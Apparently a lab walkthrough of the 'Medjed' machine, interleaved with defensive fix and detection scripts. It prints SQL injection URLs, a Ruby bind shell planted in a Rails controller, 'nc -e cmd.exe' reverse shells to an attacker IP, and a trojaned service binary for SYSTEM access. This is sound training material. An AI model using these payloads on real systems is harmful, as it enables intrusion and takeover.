# Medjed

## Information Gathering

### Service Enumeration

`nmapAutomator.sh -H 192.168.237.127 -t full`

`nmapAutomator.sh -H 192.168.237.127 -t vulns`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIaOtLzR5VXCOha9m%2F98a21f1b266047eebb5c23b2074e0829.png?alt=media\&token=17b4f873-3324-4e1e-a3d9-ea8b1bb5a3f6)

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIdSnn_z897pHDmzv%2F4125fc1176414228be29a1a0146d1ed9.png?alt=media\&token=c5b1badb-8c77-483e-9fbc-17021a8370fa)

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIgGtPB7BPvfIInwM%2Fd94f18ebc231434fa1942e1925aacb95.png?alt=media\&token=376d2be6-9caf-49a1-b3f5-46f82f615836)

### FTP

Anonymous sessions are allowed. Recursively download the entire directory:

`wget -r ftp://anonymous@192.168.237.127:30021`

This appears to be a default Ruby on Rails installation.

### HTTP

On port 3303, we find a web application with the team's profiles. We can try their names as usernames to log in.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIkFVjhP6Sd7RoO2L%2F6c312c0109de44bf859c6cb387fcbf4c.png?alt=media\&token=296488f8-063b-4fc9-9ea2-425862c6f3cc)

There is a password reset feature.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIoHFuwVxjTmi3hRI%2Feb2f363c3f544fcb9b102ccad8186d10.png?alt=media\&token=6e69073d-4bc6-4e7e-94e3-297ce494af79)

When using the username `christopher`, we get "The password reminder doesn't match the records", which differs from the response for the other users, "The user does not exist".

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIsXzEhvFAg3g7QTT%2Fdd73704ab984430ba4b6883ac56d167d.png?alt=media\&token=4de66e3f-e691-4db1-9307-512a33d49de0)

Hence, we can confirm that `christopher` is a valid user.

Tried:

* SQL injection for password reminder (failed)

I then realised that the users page is on the `/users` path. Requesting `http://192.168.237.127:33033/users/christopher` returns an error traceback.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJ3lij2xVfm3YTwsf%2Fb7e405d0d15144a59470c1442b03e2f3.png?alt=media\&token=1e5d8882-8f80-4922-87e3-79a39ab70089)

Now that we know a traceback is shown, we can request an invalid path to see the available routes.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIyPxGKm11Ppb6JS6%2F19da4e71d25f49df8df9b47fb5cbb990.png?alt=media\&token=34aba64a-7ba0-415d-9916-46359f6fc1f0)

`/users` takes 4 request methods:

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJ9-EUEwHfqMSWWfx%2Fc6054de84f8747a7b3405fd4e64b0698.png?alt=media\&token=ee247356-57d0-4b28-821c-ff79c3b87876)

Tried:

* all 4 allowed request methods (failed - authentication)

There is another interesting path, `/slug`.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJETgyM7H3ulqk0ND%2F040f006b50e349c98c723bbf6d59d4ca.png?alt=media\&token=f5f99fed-137b-4173-b4f5-fc010a3016c4)

When fuzzing the input, I found that a single quote causes an error.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJJ26lgpEE770xqd7%2F83492ce915c446f69d429bc13014427b.png?alt=media\&token=457b37df-9808-47be-83bb-17223f529c9d)

This revealed the source code that constructs the SQL query.

```ruby
sql = "SELECT username FROM users WHERE username = '" + params[:URL].to_s + "'"
```

This is a classic SQL injection vulnerability. The difference here is that the response is the same whether the query evaluates to true or false, so we get no direct feedback on the query output. The **MySQL error is reflected**, however, which makes this an **error-based injection**.
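The fix for the concatenation shown in the traceback, as an added example (this is not code from the writeup or from the Medjed application): the SQL text stays constant and the parameter travels as a bind value, with an allowlist check in front of it. The function names, the slug pattern and the hash standing in for the database driver are this example's own assumptions; `User.where("username = ?", ...)` in the comments is the real ActiveRecord form.

```ruby
# Added example, not the application's code. Function names and the slug
# pattern are assumptions made for illustration.

# Vulnerable shape from the traceback: the parameter becomes part of the SQL text.
def build_query_vulnerable(url_param)
  "SELECT username FROM users WHERE username = '" + url_param.to_s + "'"
end

# Hardened shape: the SQL text is fixed and the value travels separately as a bind.
# In the real Rails controller this is User.where("username = ?", params[:URL]) or
# User.where(username: params[:URL]); a hash stands in for the database driver so
# the example runs without one.
SAFE_SQL = "SELECT username FROM users WHERE username = ?".freeze

def build_query_safe(url_param)
  { sql: SAFE_SQL, binds: [url_param.to_s] }
end

# Defence in depth: the slug is a username such as "evren.eagan", so anything that
# does not look like one is rejected before the query layer ever sees it.
SLUG_PATTERN = /\A[a-z0-9][a-z0-9._-]{0,31}\z/

def valid_slug?(url_param)
  SLUG_PATTERN.match?(url_param.to_s)
end

# What the controller should do: validate, then build a bound statement. nil tells
# the caller to answer 404 without touching SQL at all.
def lookup_statement(url_param)
  return nil unless valid_slug?(url_param)
  build_query_safe(url_param)
end

# Crude self-check on the vulnerable shape: an intact string literal contributes
# exactly two single quotes, so any other count means the literal was broken out of.
def literal_intact?(sql)
  sql.count("'") == 2
end

# The page's first payload, used only to compare the two shapes.
PAYLOAD = "' UNION SELECT IF(1=2, SLEEP(5), null)-- -".freeze

if __FILE__ == $PROGRAM_NAME
  ["christopher", PAYLOAD].each do |input|
    vulnerable = build_query_vulnerable(input)
    puts "input:      #{input.inspect}"
    puts "vulnerable: #{vulnerable}  literal intact=#{literal_intact?(vulnerable)}"
    puts "safe:       #{build_query_safe(input).inspect}"
    puts "accepted:   #{valid_slug?(input)}"
  end
end
```

The traceback itself is a separate finding: Rails renders full error pages and the route listing only when `config.consider_all_requests_local` is true (the development default). A production deployment should have it set to false so that neither the SQL text nor the route table is disclosed to clients.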

## Exploitation

### Option 1 - Time Based Boolean Blind

```sql
SELECT username FROM users WHERE username = '' UNION SELECT IF(1=1, SLEEP(5), null)-- -
```

`http://192.168.237.127:33033/slug?URL=%27%20UNION%20SELECT%20IF(1=2,%20SLEEP(5),%20null)--%20-`

The `IF` conditional makes the server sleep for 5 seconds if the condition is true and respond immediately otherwise.

### Option 2 - Error Based

If we do something like

```sql
SELECT username FROM users WHERE username = '' AND 1= (SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT username FROM users LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- -
```

The `SELECT username FROM users LIMIT 0,1` output gets reflected in the MySQL error.

`http://192.168.237.127:33033/slug?URL=%27%20AND%201=%20(SELECT%201%20FROM(SELECT%20COUNT(*),concat(0x3a,(SELECT%20username%20FROM%20users%20LIMIT%200,1),FLOOR(rand(0)*2))x%20FROM%20information_schema.TABLES%20GROUP%20BY%20x)a)--%20-`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJVMwd_fpoXp5K5tE%2F88e9f04f0fa640bc9b4e6ea1ecfb9f52.png?alt=media\&token=c3d15641-69a3-442e-ac1b-9250e0a29cdb)

In this case, we can see that `evren.eagan` is the first username.

Replacing the inner query with `SELECT reminder FROM USERS LIMIT 0,1`, we see the reminder, `4qpdR87QYjRbog`.

`http://192.168.237.127:33033/slug?URL=%27%20AND%201=%20(SELECT%201%20FROM(SELECT%20COUNT(*),concat(0x3a,(SELECT%20reminder%20FROM%20USERS%20LIMIT%200,1),FLOOR(rand(0)*2))x%20FROM%20information_schema.TABLES%20GROUP%20BY%20x)a)--%20-`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJ_BfxGd7Wy7Q1oxG%2Fb304646cfb9b4f7993b11fe6300ba5ca.png?alt=media\&token=a6c56c23-8c0a-45f0-80a1-14c2a9b9309e)

With this, we can go back to the password reset page and successfully reset the password.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJdO1MR4Gs65ZV25k%2Fa08384f350924cb7ad860668b8c032bd.png?alt=media\&token=c7e54586-180d-4384-9487-73ad1ede127a)

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJj-3VqAJ0L8yQ5io%2F0954fae671154dcdbb04fca50dc17303.png?alt=media\&token=406762d2-9ef7-480c-a589-3295d164bbd9)
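On the detection side, the two payload styles used against `/slug` leave different traces: the time-based variant shows up as an abnormally slow response, the error-based variant as a 500 with SQL keywords in the decoded `URL` parameter. The following script is an added example, not part of the writeup. It parses constructed access-log lines in a combined-log-style format with a trailing request duration in seconds (an assumption; adjust `LINE_RE` for your server's format) and scores each request. The indicator weights, the 4-second threshold and the function names are this example's own choices.

```ruby
require "uri"

# Constructed sample lines (not real Medjed traffic). The format is assumed:
# combined log plus the request duration in seconds as the last field.
SAMPLE_LOG = <<~'LOG'
  10.0.0.5 - - [01/May/2021:10:00:01 +0000] "GET /users/christopher HTTP/1.1" 500 812 0.021
  10.0.0.5 - - [01/May/2021:10:00:09 +0000] "GET /slug?URL=christopher HTTP/1.1" 200 512 0.018
  10.0.0.5 - - [01/May/2021:10:00:15 +0000] "GET /slug?URL=%27%20UNION%20SELECT%20IF(1=1,%20SLEEP(5),%20null)--%20- HTTP/1.1" 200 512 5.012
  10.0.0.5 - - [01/May/2021:10:00:22 +0000] "GET /slug?URL=%27%20AND%201=%20(SELECT%201%20FROM(SELECT%20COUNT(*),concat(0x3a,(SELECT%20username%20FROM%20users%20LIMIT%200,1),FLOOR(rand(0)*2))x%20FROM%20information_schema.TABLES%20GROUP%20BY%20x)a)--%20- HTTP/1.1" 500 2048 0.030
LOG

LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3}) \S+ (?<secs>[\d.]+)\z/

# Keywords that have no business in a username slug.
SQL_KEYWORDS = /\b(UNION|SELECT|SLEEP|BENCHMARK|INFORMATION_SCHEMA|CONCAT)\b/i
COMMENT_TAIL = /--|#|\/\*/
SLOW_SECONDS = 4.0 # assumption: a normal /slug lookup takes milliseconds

INDICATOR_WEIGHTS = {
  sql_keyword: 3, quote_break: 2, slow_response: 2, server_error: 1, bad_encoding: 1
}.freeze

# Pull the URL parameter out of the request target, decoded the way Rack would.
# Returns [decoded_value_or_nil, malformed_percent_encoding?].
def extract_url_param(target)
  _path, query = target.split("?", 2)
  return [nil, false] if query.nil?
  malformed = query.match?(/%(?!\h\h)/)
  value = URI.decode_www_form(query).find { |k, _| k == "URL" }&.last
  [value, malformed]
end

# Score a single log line; nil when the line does not match the expected format.
def analyze_line(line)
  m = LINE_RE.match(line.strip)
  return nil unless m
  path = m[:target].split("?", 2).first
  param, malformed = extract_url_param(m[:target])
  indicators = []
  if param
    indicators << :sql_keyword if param.match?(SQL_KEYWORDS)
    # A quote followed by a comment sequence is the signature of breaking out of a literal.
    indicators << :quote_break if param.include?("'") && param.match?(COMMENT_TAIL)
  end
  indicators << :bad_encoding if malformed
  indicators << :slow_response if m[:secs].to_f >= SLOW_SECONDS
  indicators << :server_error if m[:status].to_i >= 500
  score = indicators.sum { |i| INDICATOR_WEIGHTS[i] }
  { ip: m[:ip], path: path, param: param, indicators: indicators,
    score: score, suspicious: score >= 2 }
end

def analyze_log(text)
  text.each_line.map { |l| analyze_line(l) }.compact
end

if __FILE__ == $PROGRAM_NAME
  analyze_log(SAMPLE_LOG).each do |r|
    next unless r[:suspicious]
    puts "#{r[:ip]} #{r[:path]} score=#{r[:score]} indicators=#{r[:indicators].join(',')}"
  end
end
```

A lone 500 (the `/users/christopher` traceback in the sample) scores below the alert threshold on its own, but it is still worth a separate rule: an application that returns stack traces to clients is leaking the same information the injection later relied on.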

Now that we are logged in as a valid user, we gain access to the edit feature.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJm9I2qKQGrquHB6Z%2F1613a5613f7a474cae8d7e72e87ecce0.png?alt=media\&token=a9f0de7c-97cd-49fe-a4eb-981efafd23d8)

### Web File Server (WFS)

There is another HTTPS service running at 44330. Here, we can upload arbitrary files.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJpuhJeNMD9j92lq2%2Fa08013d5448b4d73ac93dc89d523da57.png?alt=media\&token=4ab73c5f-917d-428f-9ed3-5750fb0a0886)

We can then upload a modified version of `users_controller.rb`, which handles HTTP requests for the `/users` path.

I edited the `PATCH/PUT` handler to include this bind shell payload: <https://github.com/secjohn/ruby-shells/blob/master/shell.rb>

```ruby
class UsersController < ApplicationController
  include BCrypt
  before_action :authorize, only: [:new, :create, :edit, :update, :destroy]
  before_action :set_user, only: [:show, :edit, :update, :destroy]

  ...

  # PATCH/PUT /users/1
  # PATCH/PUT /users/1.json
  def update
    require 'socket'
    require 'open3'

    # The number passed to tcp_server_loop is the port the shell listens on.
    Socket.tcp_server_loop(5555) do |sock, client_addrinfo|
      begin
        while command = sock.gets
          Open3.popen2e("#{command}") do |stdin, stdout_and_stderr|
            IO.copy_stream(stdout_and_stderr, sock)
          end
        end
      rescue
        break if command =~ /IQuit!/
        sock.write "Command or file not found.\n"
        sock.write "Type IQuit! to kill the shell forever on the server.\n"
        sock.write "Use ^] or ctl+C (telnet or nc) to exit and keep it open.\n"
        retry
      ensure
        sock.close
      end
    end

    ...

end
```

After uploading the modified `users_controller.rb` and submitting the "Update User" form, we can then connect to the bind shell.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJtMx0Vo14HnmFY67%2Fea5fa523792c411382b0211318af27a5.png?alt=media\&token=2f23fe41-a190-4d82-b6d2-f064dafcd5b9)

To get a more stable and interactive shell, we can transfer `nc.exe` and run it.

Copy netcat over SMB: `copy \\192.168.49.237\ROPNOP\nc.exe .`

Create another reverse shell: `nc -e cmd.exe 192.168.49.237 139`

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJx0x4OS9yB8RsGtT%2Fe355535d58254af8a77f69166995ca5c.png?alt=media\&token=3f76562c-c40b-45b9-b269-57848d77175a)

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJzXOU4VnrE4e1Tdu%2F4b6b0f0a75c14b96b3cf27160fa29e63.png?alt=media\&token=ab83343e-8700-4980-845a-0b2da1212d1a)

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadK1Ou9olMJp89vpk3%2Fd7300e0f22074c459261ec0505aca479.png?alt=media\&token=e33debc2-41f6-46ab-b831-b1abaccfd2cd)

## Privilege Escalation

In the WinPEAS output, we find an interesting AutoRun executable, `bdctl.exe`. This is an executable from the BarracudaDrive program.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadK5GsLfPTgkJOy8L4%2F761d1012fbf040b896c28a58ee7c0a55.png?alt=media\&token=22791b92-6548-4c58-8c6c-d6abf39b5912)

Looking in the `C:\bd` directory, we find a `readme.txt` which shows the changelog.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadK84Fab7upIgAFSA7%2F6ceb4ce013644c20a89017ef86fbf610.png?alt=media\&token=817e5588-a38f-4b2c-9e7a-041cecf3be09)

It appears that the version of BarracudaDrive is 6.5, since the changelog stops there.

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadKBN_qFuLM5PGf8Zb%2F65116cfe1c9f42519c4a472bcf2c9ea9.png?alt=media\&token=86b45cce-3cba-4d0d-8ae5-2e7e42acad9b)

This version is vulnerable to a local privilege escalation: <https://www.exploit-db.com/exploits/48789>

Create `addAdmin.c`:

```c
#include <stdlib.h>   /* system() */
#include <windows.h>  /* WinExec() */

int main(void)
{
    /* Spawn the reverse shell, then start the real service binary (renamed
       to bd.service.exe) so the service still comes up normally. */
    system("C:\\Sites\\userpro\\nc.exe 192.168.49.237 139 -e cmd.exe");
    WinExec("C:\\bd\\bd.service.exe", 0);
    return 0;
}
```

On reboot, this will spawn a new reverse shell as SYSTEM.

Cross-compile for Windows: `i686-w64-mingw32-gcc addAdmin.c -o bd.exe`

Move the existing `bd.exe`: `move bd.exe bd.service.exe`

Copy the new malicious `bd.exe`: `copy \\192.168.49.237\ROPNOP\bd.exe .`

Now restart the system: `shutdown /r`. We should be able to catch a shell as SYSTEM:

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadKK5sx_ZpLmqc9m8T%2F93fb81e275c546ce9fb9f6c6cd06e8d9.png?alt=media\&token=f605bfed-408e-4dcd-9e53-1de025d419c7)

![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadKM7SPe6coBFy4ToS%2F51635976728b488aa4e72138b73b9669.png?alt=media\&token=681bb92c-8759-4cb3-b404-45544f9137c6)
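The root cause of this escalation is a service directory that ordinary users can write to, so the binary an AutoRun or service entry starts can be swapped. A defender-side check for that condition, as an added example that is not part of the writeup: the script below parses `icacls` output (the samples here are constructed and labelled as such; on a real host you would run `icacls "C:\bd"` for each service directory and feed the text in) and reports ACEs that grant write-capable rights to low-privileged principals. The principal list, the set of rights treated as write-capable and the function names are this example's own assumptions.

```ruby
# Constructed icacls output for two directories (not captured from the Medjed host).
SAMPLE_ICACLS = {
  'C:\bd' => <<~'OUT',
    C:\bd NT AUTHORITY\SYSTEM:(OI)(CI)(F)
          BUILTIN\Administrators:(OI)(CI)(F)
          BUILTIN\Users:(OI)(CI)(F)

    Successfully processed 1 files; Failed processing 0 files
  OUT
  'C:\Program Files\Example Service' => <<~'OUT',
    C:\Program Files\Example Service NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                                     BUILTIN\Administrators:(OI)(CI)(F)
                                     BUILTIN\Users:(OI)(CI)(RX)
                                     Everyone:(DENY)(OI)(CI)(W)

    Successfully processed 1 files; Failed processing 0 files
  OUT
}.freeze

# icacls simple rights and specific rights that allow creating, replacing or
# deleting files in the directory (assumed set, extend as needed).
WRITE_RIGHTS = %w[F M W WD AD DC WDAC WO].freeze
# Inheritance flags, which are not rights.
INHERITANCE = %w[OI CI IO NP I].freeze
# Principals that any local user can act as (assumed list).
LOW_PRIV = ['BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users',
            'NT AUTHORITY\INTERACTIVE', 'BUILTIN\Guests'].map(&:downcase).freeze

# Parse one icacls invocation for a known path into a list of
# { principal:, rights:, deny: } hashes. Knowing the path up front avoids the
# ambiguity between paths and principals that both contain spaces.
def parse_icacls(path, output)
  output.each_line.each_with_object([]) do |raw, aces|
    line = raw.strip
    next if line.empty? || line.start_with?("Successfully processed")
    line = line.delete_prefix(path).strip if line.start_with?(path)
    m = line.match(/\A(?<principal>[^:()]+):(?<flags>(?:\([^)]*\))+)\z/)
    next unless m
    tokens = m[:flags].scan(/\(([^)]*)\)/).flatten.flat_map { |t| t.split(",") }.map(&:strip)
    deny = !tokens.delete("DENY").nil? # a DENY ACE removes access, it never grants it
    aces << { principal: m[:principal].strip, rights: tokens - INHERITANCE, deny: deny }
  end
end

# ACEs that let a low-privileged principal write into the directory.
def writable_by_low_priv(path, output)
  parse_icacls(path, output).select do |ace|
    !ace[:deny] && LOW_PRIV.include?(ace[:principal].downcase) &&
      (ace[:rights] & WRITE_RIGHTS).any?
  end
end

# Map each audited path to the offending "principal (rights)" strings.
def audit(samples)
  samples.each_with_object({}) do |(path, output), findings|
    findings[path] = writable_by_low_priv(path, output)
                     .map { |ace| "#{ace[:principal]} (#{ace[:rights].join(',')})" }
  end
end

if __FILE__ == $PROGRAM_NAME
  audit(SAMPLE_ICACLS).each do |path, hits|
    puts(hits.empty? ? "OK       #{path}" : "WRITABLE #{path}: #{hits.join('; ')}")
  end
end
```

The remediation is the inverse of the finding: service directories and the binaries in them should be writable only by Administrators and SYSTEM, and a service account should never own the directory its own executable lives in.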
